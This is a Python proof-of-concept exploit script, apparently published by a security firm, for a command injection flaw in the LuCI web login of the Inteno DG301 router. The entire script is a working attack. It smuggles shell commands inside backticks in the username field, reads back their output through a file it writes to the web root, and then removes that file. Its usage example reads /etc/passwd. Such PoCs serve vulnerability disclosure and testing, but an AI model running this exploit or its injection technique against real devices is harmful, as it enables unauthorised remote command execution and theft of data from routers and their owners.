#!/usr/bin/python
################################################################
# #
# Inteno DG301 Command Injection PoC #
# #
# Vulnerable version: Powered by LuCI Trunk (inteno-1.0.34) #
# OpenWrt Backfire 10.03.1-RC6 #
# #
# Written by Juan J. Guelfo @ Encripto AS #
# post@encripto.no #
# #
# Copyright 2014 Encripto AS. All rights reserved. #
# #
# This software is licensed under the FreeBSD license. #
# http://www.encripto.no/tools/license.php #
# #
################################################################
import sys, getopt, urllib, urllib2
__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"
# Prints title and other header info
def header():
print ""
print " ================================================================= "
print "| Inteno DG301 v1.0.34 Command Injection PoC \t\t\t |".format(__version__)
print "| by {0}\t\t |".format(__author__)
print " ================================================================= "
print ""
# Prints help
def help():
header()
print """ Usage: python Inteno-DG301-PoC.py [mandatory options]
Mandatory options:
-t target ...Target IP address
-p port ...Port where the HTTP admin interface is listening on
-c cmd ...Command to inject
Example:
python Inteno-DG301-PoC.py -t 192.168.1.1 -p 80 -c "cat /etc/passwd"
"""
sys.exit(0)
if __name__ == '__main__':
#Parse options
try:
options, args = getopt.getopt(sys.argv[1:], "t:p:c:", ["target=", "port=", "cmd="])
except getopt.GetoptError, err:
header()
print "\n[-] Error: {0}.\n".format(str(err))
sys.exit(1)
if not options:
help()
target = None
port = None
cmd = None
reset = None
for opt, arg in options:
if opt in ("-t"):
target = arg
if opt in ("-p"):
port = arg
if opt in ("-c"):
cmd = arg
#Option input validation
if not target or not port or not cmd:
help()
print "[-] Error: Incorrect syntax.\n"
sys.exit(1)
header()
print "[*] Trying to connect to {0}:{1}...".format(target, port)
headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"}
try:
# Inject command
print "[*] Sending command: {0}".format(cmd)
data = "username=user`"+ urllib.quote(cmd) + "%20>%20/www/poc.txt`&password=pass"
r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
results = urllib2.urlopen(r).read()
# Retrieve results
r = urllib2.Request("http://%s:%s/poc.txt" % (target, port), None, headers)
results = urllib2.urlopen(r).read()
# Show results
print "[+] Retrieving results...\n"
print results
# Clean output file
data = "username=user`rm%20/www/poc.txt`&password=pass"
r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
results = urllib2.urlopen(r).read()
print "[*] Cleaning up...\n"
except urllib2.URLError:
print "[-] Error: The connection could not be established.\n"
except IOError as e:
print "[-] Error: {0}...\n".format(e.strerror)
sys.exit(0)